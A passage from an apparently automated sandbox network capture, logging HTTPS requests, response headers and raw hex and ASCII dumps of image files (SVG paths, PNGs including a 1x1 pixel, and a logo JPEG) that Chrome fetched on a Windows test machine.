                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1378INData Raw: 31 2e 31 20 31 2e 34 2d 32 2e 39 20 32 2e 31 2d 34 2e 39 20 32 2e 31 2d 33 2e 35 20 30 2d 35 2e 35 2d 32 2e 35 2d 35 2e 35 2d 35 2e 32 20 30 2d 34 2e 34 20 33 2e 39 2d 36 2e 35 20 31 30 2d 36 2e 35 76 2d 2e 32 63 30 2d 2e 39 2d 2e 35 2d 32 2e 32 2d 33 2e 31 2d 32 2e 32 2d 31 2e 37 20 30 2d 33 2e 36 2e 36 2d 34 2e 37 20 31 2e 33 6c 2d 31 2d 33 2e 34 63 31 2e 32 2d 2e 37 20 33 2e 35 2d 31 2e 35 20 36 2e 36 2d 31 2e 35 20 35 2e 37 20 30 20 37 2e 34 20 33 2e 34 20 37 2e 34 20 37 2e 34 76 35 2e 39 63 30 20 31 2e 36 2e 31 20 33 2e 32 2e 33 20 34 2e 31 6c 2d 34 2e 37 2d 2e 31 7a 6d 38 2e 37 2d 31 31 2e 35 63 30 2d 32 2e 31 2d 2e 31 2d 33 2e 39 2d 2e 32 2d 35 2e 35 68 34 2e 36 6c 2e 33 20 32 2e 34 68 2e 31 63 2e 37 2d 31 2e 31 20 32 2e 34 2d 32 2e 38 20 35 2e 32
                                                                                                                                                                                                                                                                                Data Ascii: 1.1 1.4-2.9 2.1-4.9 2.1-3.5 0-5.5-2.5-5.5-5.2 0-4.4 3.9-6.5 10-6.5v-.2c0-.9-.5-2.2-3.1-2.2-1.7 0-3.6.6-4.7 1.3l-1-3.4c1.2-.7 3.5-1.5 6.6-1.5 5.7 0 7.4 3.4 7.4 7.4v5.9c0 1.6.1 3.2.3 4.1l-4.7-.1zm8.7-11.5c0-2.1-.1-3.9-.2-5.5h4.6l.3 2.4h.1c.7-1.1 2.4-2.8 5.2
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC881INData Raw: 6f 70 20 6f 66 66 73 65 74 3d 22 30 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 66 66 64 33 37 62 22 2f 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 66 66 39 64 30 30 22 2f 3e 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 3c 70 61 74 68 20 69 64 3d 22 53 68 61 70 65 5f 31 5f 22 20 64 3d 22 4d 38 36 2e 31 20 38 37 2e 33 63 2d 2e 39 2d 32 2e 34 2d 32 2e 33 2d 34 2e 36 2d 33 2e 39 2d 36 2e 36 2d 31 2e 32 2d 31 2e 36 2d 32 2e 36 2d 33 2d 34 2e 33 2d 34 2e 31 2d 2e 33 2d 2e 32 2d 2e 36 2d 2e 33 2d 2e 39 2d 2e 31 2d 34 2e 33 20 32 2e 35 2d 38 2e 37 20 34 2e 36 2d 31 33 2e 34 20 36 2e 33 2d 33 2e 33 20 31 2e 32 2d 36 2e 38 20 32 2e 32 2d 31 30 2e 34 20 32 2e 35 2d 32 2e 39 2e 33 2d 35 2e 37 2e 31 2d 38 2e 36
                                                                                                                                                                                                                                                                                Data Ascii: op offset="0" stop-color="#ffd37b"/><stop offset="1" stop-color="#ff9d00"/></linearGradient><path id="Shape_1_" d="M86.1 87.3c-.9-2.4-2.3-4.6-3.9-6.6-1.2-1.6-2.6-3-4.3-4.1-.3-.2-.6-.3-.9-.1-4.3 2.5-8.7 4.6-13.4 6.3-3.3 1.2-6.8 2.2-10.4 2.5-2.9.3-5.7.1-8.6


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                23192.168.2.649746104.18.43.94433568C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC610OUTGET /uploads/user/cb07091a-9803-4eab-aa81-fd133653f44b/fjLo-hhcap.png HTTP/1.1
                                                                                                                                                                                                                                                                                Host: uploads.codesandbox.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1038INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:54 GMT
                                                                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                                                                Content-Length: 24296
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=3600
                                                                                                                                                                                                                                                                                Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                                                                                                                Cf-Polished: origSize=50935
                                                                                                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                                                                                                access-control-expose-headers: Content-Type
                                                                                                                                                                                                                                                                                etag: "5515ae63a3e02bc196798380e50db72f"
                                                                                                                                                                                                                                                                                expires: Sun, 06 Oct 2024 15:04:35 GMT
                                                                                                                                                                                                                                                                                last-modified: Fri, 12 Aug 2022 09:41:54 GMT
                                                                                                                                                                                                                                                                                x-goog-generation: 1660297314302637
                                                                                                                                                                                                                                                                                x-goog-hash: crc32c=OXqjWA==
                                                                                                                                                                                                                                                                                x-goog-hash: md5=VRWuY6PgK8GWeYOA5Q23Lw==
                                                                                                                                                                                                                                                                                x-goog-metageneration: 1
                                                                                                                                                                                                                                                                                x-goog-storage-class: REGIONAL
                                                                                                                                                                                                                                                                                x-goog-stored-content-encoding: identity
                                                                                                                                                                                                                                                                                x-goog-stored-content-length: 50935
                                                                                                                                                                                                                                                                                x-guploader-uploadid: ABPtcPp2fhPCGNIpcQlwaY2Oh19QvVEbZFwXcHB2slG-vKQEDnXXgaFBhs9kyVN8uVVomh0rOLytQI6QxQ
                                                                                                                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                Age: 2239
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Set-Cookie: _cfuvid=._XNCH1d1zLfrUiFyS3nncmcFBwSXAaSjcbhUhvZEtw-1728225714517-0.0.1.1-604800000; path=/; domain=.codesandbox.io; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                CF-RAY: 8ce66a3badc7430f-EWR
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC331INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 a6 00 00 00 b6 08 02 00 00 00 84 50 d8 7a 00 00 0c 56 69 43 43 50 69 63 63 00 00 78 da ad 97 77 58 d3 d7 f7 c7 cf 67 24 21 81 b0 41 40 46 d8 4b 10 d9 43 46 08 2b 80 ec 21 88 4a 48 02 84 11 63 48 50 71 8f 52 05 eb 16 51 9c 68 55 c4 a2 d5 0a 48 1d 88 5a b5 52 04 b7 75 14 b5 a8 54 6a 51 8b 0b 95 df 85 04 f4 67 fb fd e3 fb 3c df f3 3c f7 73 5f cf fb 9e 7b ee 39 e7 26 cf e7 f9 00 68 bc e1 49 24 05 b8 26 40 a1 58 26 4d 08 0f 66 4d 4c 4b 67 d1 1e 01 15 46 83 26 98 83 19 8f 5f 24 61 c7 c5 45 03 32 c5 fc a5 bd ba 0e 18 20 bb e2 34 18 0b fe 3b d3 16 08 8b f8 00 58 06 e2 2c 41 11 bf 10 71 33 00 b9 99 2f 91 ca 00 a8 83 ba e5 0c 99 64 90 17 20 d6 95 a2 04 11 af 1b e4 1c 05 ef 1d e4 2c 05 1f 1b f2 49 4a e0 20 6e
                                                                                                                                                                                                                                                                                Data Ascii: PNGIHDRPzViCCPiccxwXg$!A@FKCF+!JHcHPqRQhUHZRuTjQg<<s_{9&hI$&@X&MfMLKgF&_$aE2 4;X,Aq3/d ,IJ n
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1369INData Raw: 37 0b fe d7 56 58 20 e7 2b d1 06 0d b5 5c 69 44 c2 60 fd 00 d8 cd fc 69 51 83 ac 86 b8 47 9c 15 13 8b 58 1b f1 1b 91 00 40 c1 38 23 57 1e 91 ac f0 c7 8d f9 45 9c 74 c4 fa 88 5d 04 bc 90 28 c4 c6 88 c3 c4 05 31 d1 4a 3d 2b 5b 14 c6 45 ac 89 78 a6 48 c6 4d 42 6c 80 78 a9 b0 28 34 51 e9 b3 5d 3a 2d 41 79 16 5e 9f 2d e5 b0 95 fa 79 9e 14 40 79 d6 3d 79 7e 32 5b 19 ff 45 ae 90 ab 8c 4f a8 97 e4 26 a5 22 66 20 b6 2a 16 a5 c4 20 56 47 ec 5c 94 9f 18 a5 f4 19 5f 92 cb 89 19 f6 91 ca 13 92 11 5b 21 4e 10 8a c3 83 15 f1 89 e2 6c 69 58 82 d2 bf ac b0 68 b8 5e 62 7b ae 88 1b a3 e4 43 b2 dc a4 08 45 7f 88 33 7c de 50 fe 06 88 db 85 62 76 f2 70 1c 61 d1 c4 e8 e1 5a 04 c2 90 50 45 ed c4 13 a1 38 39 51 19 e7 8d 44 16 9c a0 d8 4b 32 24 05 71 4a 7f d2 42 58 10 3e a8 5b 20
                                                                                                                                                                                                                                                                                Data Ascii: 7VX +\iD`iQGX@8#WEt](1J=+[ExHMBlx(4Q]:-Ay^-y@y=y~2[EO&"f * VG\_[!NliXh^b{CE3|PbvpaZPE89QDK2$qJBX>[
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1369INData Raw: 2e 1b 7d 68 f4 af c6 b8 b1 83 71 82 f1 6c e3 9d c6 ad c6 7d 26 a6 26 e1 26 12 93 8d 26 a7 4d 7a 4c f5 4d 83 4c f3 4c d7 99 9e 30 ed 36 d3 31 0b 30 13 99 ad 33 3b 69 f6 07 4b 8f c5 66 15 b0 2a 59 67 58 bd e6 c6 e6 11 e6 72 f3 1d e6 6d e6 fd 16 b6 16 c9 16 8b 2c 0e 58 dc b5 64 58 7a 5b 66 5b ae b3 6c b1 ec b5 32 b3 9a 60 35 c7 aa d6 ea 57 6b ba b5 b7 75 ae f5 06 eb 73 d6 af 6d 6c 6d 52 6d be b6 69 b0 79 62 6b 60 cb b5 2d b1 ad b5 bd 63 c7 b4 0b b4 9b 6e 57 6d 77 d5 9e 6a ef 6d 9f 6f bf c5 be dd 01 77 f0 70 c8 75 a8 72 b8 e4 88 3b 7a 3a 8a 1c b7 38 76 8c a1 8c f1 19 23 1e 53 3d e6 86 93 9a 13 db a9 d8 a9 d6 e9 be b3 be 73 b4 f3 22 e7 06 e7 67 63 ad c6 a6 8f 5d 3d f6 dc d8 8f 2e 1e 2e 05 2e bb 5c 6e 8f d3 1e 17 39 6e d1 b8 a6 71 2f 5c 1d 5c f9 ae 55 ae 57 dd
                                                                                                                                                                                                                                                                                Data Ascii: .}hql}&&&&MzLMLL06103;iKf*YgXrm,XdXz[f[l2`5WkusmlmRmiybk`-cnWmwjmowpur;z:8v#S=s"gc]=...\n9nq/\\UW
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1369INData Raw: d9 00 2f f6 00 30 d3 00 74 da 01 18 93 86 be 05 15 86 01 36 42 f0 9f 78 e8 7b 51 61 9e 00 75 ba 00 f1 3d 00 9c 1b 00 07 77 01 d8 a0 f8 1a 19 00 71 4c 80 24 1f c0 dd dc 46 86 d2 8a b2 dd 5c 15 b1 d4 82 01 28 f7 06 06 5e da 00 d0 d6 02 7c 58 35 30 d0 5f 3d 30 f0 61 27 00 71 07 a0 59 3c f4 0d 3a 64 54 4d 80 ed dc 0f 59 85 59 f0 2f 86 6a 90 7c 5e e3 3f 66 18 cc c0 1d be 9c ff 0f 0a df 90 fa 24 fd a5 2d 00 00 52 4d 49 44 41 54 78 da ec d6 41 6f e3 20 10 86 61 fe ff 9f 24 1c bc 92 15 7a 4c 52 63 e9 f3 6a b1 13 6c 0f 64 d5 43 5b 0e ef 48 15 30 33 3c 23 a5 07 ec 16 13 3a 1c ca 51 da 37 e8 d0 ad ad 6e 19 7c 7c 7c 7c 7c 7c fc 1e 7c 67 64 73 d7 4e af d0 6a 24 84 8f 8f 8f 8f 8f 8f df 83 ef 4e 8e ca dc 72 c9 86 1a 07 99 36 7c 7c 7c 7c 7c 7c fc 1e 7c d7 70 54 47 b4 34
                                                                                                                                                                                                                                                                                Data Ascii: /0t6Bx{Qau=wqL$F\(^|X50_=0a'qY<:dTMYY/j|^?f$-RMIDATxAo a$zLRcjldC[H03<#:Q7n|||||||gdsNj$Nr6|||||||pTG4
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1369INData Raw: 56 8e 3f fe f8 e3 8f 3f fe af e2 c3 f1 bf dd 7f df fe 3a b3 02 f0 74 6e ec f5 dc c7 7b 0e 3f e5 88 b8 ef 78 bc c0 40 81 cd fa a0 a7 b0 91 85 82 ac 02 ea 9a a7 80 14 99 2c 68 fc f1 c7 1f 7f fc f1 7f ba ff ea 8f df ee bf 6f 7f c1 d5 ae 57 00 be c8 3c f3 dd dc 3d 01 71 2e 23 c6 39 31 89 08 21 6c 83 c8 b9 21 80 c4 89 b1 21 f6 e2 94 d8 f8 b1 ad 00 cd 6d 00 30 fe f8 e3 8f 3f fe f8 3f da 27 7c f4 c7 6f f7 df b7 ff db 89 0a 22 9c 9d 72 0b 77 46 b8 b3 9c 71 ab cf 7f 0c 90 cc e0 fa 28 84 91 08 1b a4 eb 25 88 01 21 74 f2 88 a5 84 c9 b9 48 b6 c6 1f 7f fc f1 c7 1f ff e7 fb c7 32 f0 bb fd f7 ed 2f 9e 77 a1 87 14 f0 0c 04 74 d7 af a9 d7 6f 10 99 7d 98 d6 a5 34 48 c4 7b 5f 09 e8 12 41 c1 f9 3b 39 b6 47 64 fc f1 c7 1f 7f fc f1 7f 1d 3f 40 be dd 7f df fe 82 7a 08 3e 70 9f
                                                                                                                                                                                                                                                                                Data Ascii: V??:tn{?x@,hoW<=q.#91!l!!m0??'|o"rwFq(%!tH2/wto}4H{_A;9Gd?@z>p
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1369INData Raw: 6c 73 da aa b8 a6 4a 00 59 3f 22 c1 b0 7e d3 b1 dc 49 aa 08 02 29 49 a4 d1 01 47 df 35 be 48 a8 11 10 05 88 40 2d 24 a3 6f f7 bb df fd ee 77 ff ac f8 c6 3c b7 3f 48 a7 f3 eb c2 a7 d1 90 a9 fe 1a 22 34 df d3 d6 ef d6 f7 7f 96 8f 1b ce df a5 5f 64 9c 1e 90 46 cd 4f 3d ed 3f d9 9f 69 72 d3 69 35 5b cb e0 97 c9 17 09 c9 b8 4e 1c fc c2 30 38 a2 d5 42 48 b0 f9 02 a4 a2 80 76 bf fb dd ef 7e f7 b7 c5 4f f3 b5 36 3f 02 a0 08 24 24 4b df 30 1d cd 8f cd af b8 56 7f f3 03 d9 f6 fe d4 59 3e 6e 38 7f 97 7e c9 c4 b6 79 c2 78 62 5b d7 18 98 26 04 58 d4 69 2b c0 44 02 01 c9 e8 8b a0 a9 13 93 10 a2 38 30 22 60 30 06 d7 ab 4c 46 9f ee 77 bf fb dd ef fe 16 fa 24 a3 5f 47 3f 8a 41 69 7e 58 f8 0c 3e 86 3a f7 63 58 d6 0f e7 4e 7f 60 f0 37 9d bf 4b bf 20 e0 7c 4d da 94 69 80 c6
                                                                                                                                                                                                                                                                                Data Ascii: lsJY?"~I)IG5H@-$ow<?H"4_dFO=?iri5[N08BHv~O6?$$K0VY>n8~yxb[&Xi+D80"`0LFw$_G?Ai~X>:cXN`7K |Mi
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1369INData Raw: cb b3 2f c8 4b 00 46 ff 97 ae 3c bc 96 2f b7 1c 3f 71 ec e4 2a ef 2f 5c bd 7f bf 96 2f ab 5b b7 fc de 89 d1 17 4c da 0c 08 d0 fc 2d eb ff 32 1f 37 9d bf 4b 7f 1f 6d 56 1c 74 64 14 12 66 1b b7 89 36 6d 18 99 1e 4c db 00 0a 18 35 45 2d 68 41 2c 06 25 31 89 0a 09 04 86 b6 a7 82 64 d4 94 24 a9 18 31 40 20 44 4c 90 ee 77 bf fb dd ef fe 26 fd 6f 3c fc 84 b3 3f ff 09 42 be fe e0 63 92 61 73 10 c6 94 f1 ba 83 97 ac e5 cb 33 df e7 7b 8f d7 62 54 c2 87 df 75 78 2d 5f 6e fe ea de cd f7 9e 38 78 f1 ce 07 af 3c b2 96 2f 37 7d f5 c4 cd f7 ec 8d 3e f7 3d fe 04 06 0c d6 14 b4 88 e1 7c cf 2b 46 2b 09 21 a2 92 70 c9 59 ee ff 32 1f 37 9d bf 4b bf 00 02 04 c9 a4 3b 8d 2d de 31 48 9b 9c c5 dd 08 18 46 d5 c1 92 42 35 20 20 a9 8a 86 0a a8 0e a6 0e be a6 90 00 84 8a 14 40 49 0d
                                                                                                                                                                                                                                                                                Data Ascii: /KF</?q*/\/[L-27KmVtdf6mL5E-hA,%1d$1@ DLw&o<?Bcas3{bTux-_n8x</7}>=|+F+!pY27K;-1HFB5 @I
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1369INData Raw: 83 11 92 59 11 69 17 22 53 a3 8c ce 3e d1 a0 08 40 6a 62 20 a8 cd 8f cd cf 74 5a cb e8 0b dd ef 7e f7 bb df fd 0d fb e3 8d b9 9f a5 7f f9 eb 2e 02 c0 17 97 2f 3f 7b f8 92 b7 fd e8 ce 5a be fc cb db ee fc 1f 77 ed bd fd f5 3b 37 5c 75 c5 0d 7f ef c7 7f f6 c8 ee 0d ef 39 32 d5 ef 84 68 a6 dc 0b b1 a2 5b d4 ff 79 3e 6e 3a 7f 97 7e c1 99 2c c3 5a b5 8d 2c 76 9f 15 25 cc 96 b7 ba 24 08 a1 50 00 44 21 31 58 6b c0 20 01 02 21 93 ec 24 26 6a 32 a0 15 0c 28 51 32 f8 74 bf fb dd ef 7e f7 37 ee f3 c2 fc b7 fd d8 0e 20 f9 81 e4 cb dd 0f 9d fa 85 db ee fc ca 83 a7 de 7f 64 f7 df 5d 75 c5 db 5e bf 43 00 a4 d5 1f 40 94 0c f5 1b 20 48 81 6c 53 ff 9d e5 e3 86 f3 77 e9 97 b9 33 5d 4d 55 1a 60 b1 55 68 d7 06 10 81 86 e1 a8 05 c1 08 32 ed a7 49 0c 68 b0 15 54 a1 f9 01 67 7f
                                                                                                                                                                                                                                                                                Data Ascii: Yi"S>@jb tZ~./?{Zw;7\u92h[y>n:~,Z,v%$PD!1Xk !$&j2(Q2t~7 d]u^C@ HlSw3]MU`Uh2IhTg
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1369INData Raw: af ff c6 ff be ef 7f 3d f3 cc d3 10 92 55 ea 7f f1 c4 ff fd ce 93 7f 74 4e d4 df fd ee 77 bf fb cf e3 47 14 03 09 a3 cf e4 0b 84 52 1d fc 2f 7f fb e4 cf 7f f2 8e 2f ff fe a9 bf 68 be dc f8 85 13 ab af 00 51 16 f5 0f 7e 5a fd c1 96 ff 65 ee 0b 5b d2 7f 17 f9 b8 d9 fc 5d fa 85 e0 44 3a 7b 68 24 b3 01 c9 c4 2b 40 12 00 13 da c4 8c 27 d5 0c 66 25 08 82 ed 77 d6 16 19 02 31 01 ac 28 55 22 49 01 b0 44 02 20 a1 20 ba 25 fe ea f5 fc cf 7c ed d3 bf f5 b5 db 9e a9 d5 04 a0 66 e7 fc 57 5f fa da 37 bf f2 af 5c b8 fd f5 77 bf fb dd ef fe 0b f5 83 22 93 1f 40 4b 4c 04 6a 9a cf 5d df 3e f5 cf 3e 71 c7 8d 9f df 7b e1 f9 b2 7a e7 fe bf 7e 7e af 42 15 d6 ea 17 5a fd b4 fa 85 4a 39 43 fd 6e 43 ff 13 67 f9 b8 e9 fc 5d fa fb 80 79 c9 4e 03 32 5e 2a 33 0d 18 06 da 30 c3 1c 21
                                                                                                                                                                                                                                                                                Data Ascii: =UtNwGR//hQ~Ze[]D:{h$+@'f%w1(U"ID %|fW_7\w"@KLj]>>q{z~~BZJ9CnCg]yN2^*30!
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1369INData Raw: 3f 74 f1 f8 c0 60 f2 f9 01 09 f6 e0 db b6 f3 ea e5 eb 62 a9 78 f3 f6 2d c3 18 9e 18 bf 57 2e 97 57 56 7e c4 fc 76 bb 3d 69 9a 53 a6 59 ad 7e df 70 36 e6 de 56 f2 f9 bc 61 18 d9 ec 9d d9 59 cb 6e d9 81 ff fb e7 af a7 4f 1e 67 32 19 63 d8 30 27 c7 2d cb 6a 36 ed 5d e5 97 c9 51 06 76 5a 8e e7 97 4a a5 54 2a 35 3a 9a 9d 9e 7e b6 fc 65 39 96 7f e9 f3 d2 94 39 51 28 14 3a f6 67 66 a6 6c 9a 66 e5 4d 25 f4 6b b5 5a 90 bf d1 58 af d7 ff be b0 9e e7 72 39 2f ff d8 d8 dd 85 85 f7 61 7f aa 5f bf 3d c8 df 4f a7 d3 23 37 46 1e 3d 2c ce bf 9b 97 fe 26 3b 66 f8 93 44 1c c6 f1 f5 57 65 7f 46 e6 9d 8a 02 96 66 5a 13 35 9c 47 53 e6 45 33 d4 b6 42 31 b1 10 e4 d4 17 f6 42 97 cb a6 e2 44 51 3c 40 81 86 4e 26 34 e1 d4 37 ce 5e d4 02 54 3a e7 7a 7e f7 cb f3 3a d8 b4 17 39 d9 f8
                                                                                                                                                                                                                                                                                Data Ascii: ?t`bx-W.WV~v=iSY~p6VaYnOg2c0'-j6]QvZJT*5:~e99Q(:gflfM%kZXr9/a_=O#7F=,&;fDWeFfZ5GSE3B1BDQ<@N&47^T:z~:9


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                24192.168.2.649747199.36.158.1004433568C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC553OUTGET /tp.png HTTP/1.1
                                                                                                                                                                                                                                                                                Host: ruletridominium.web.app
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC589INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Content-Length: 67
                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                                                                Etag: "a860664afe73299c9d64214119a53a87b09e5d7b7ec8da64e55a07cd8ced3554"
                                                                                                                                                                                                                                                                                Last-Modified: Sat, 19 Feb 2022 17:52:41 GMT
                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31556926; includeSubDomains; preload
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:54 GMT
                                                                                                                                                                                                                                                                                X-Served-By: cache-ewr-kewr1740029-EWR
                                                                                                                                                                                                                                                                                X-Cache: HIT
                                                                                                                                                                                                                                                                                X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                X-Timer: S1728225715.513456,VS0,VE1
                                                                                                                                                                                                                                                                                Vary: x-fh-requested-host, accept-encoding
                                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC67INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 08 00 00 00 00 3a 7e 9b 55 00 00 00 0a 49 44 41 54 18 57 63 f8 0f 00 01 01 01 00 5a 4d 6f f1 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                                                Data Ascii: PNGIHDR:~UIDATWcZMoIENDB`


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                25192.168.2.649749173.208.137.674433568C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:55 UTC634OUTGET /picdir/middle/197-1975093_facebook-instagram-twitter-youtube-google-linkein-twitter-logo.png HTTP/1.1
                                                                                                                                                                                                                                                                                Host: www.pinclipart.com
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-06 14:41:55 UTC260INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Server: nginx/1.14.0
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:55 GMT
                                                                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                                                                Content-Length: 72247
                                                                                                                                                                                                                                                                                Last-Modified: Sun, 22 Dec 2019 00:35:30 GMT
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                ETag: "5dfeba52-11a37"
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:41:55 UTC16124INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ff db 00 43 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ff c0 00 11 08 03 03 03 70 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                                                                                                                                                                Data Ascii: JFIFCCp"}!1AQa"q2
